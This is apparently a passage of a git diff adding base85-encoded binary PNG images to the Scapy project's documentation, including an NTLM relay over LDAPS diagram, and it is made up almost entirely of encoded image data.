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 AO8@`> literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/ntlm/ntlmrelay_ldaps.png b/doc/scapy/graphics/ntlm/ntlmrelay_ldaps.png new file mode 100644 index 0000000000000000000000000000000000000000..34f1b659547d87b7d83d8f94b014bc32e09b20f6 GIT binary patch literal 53781 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 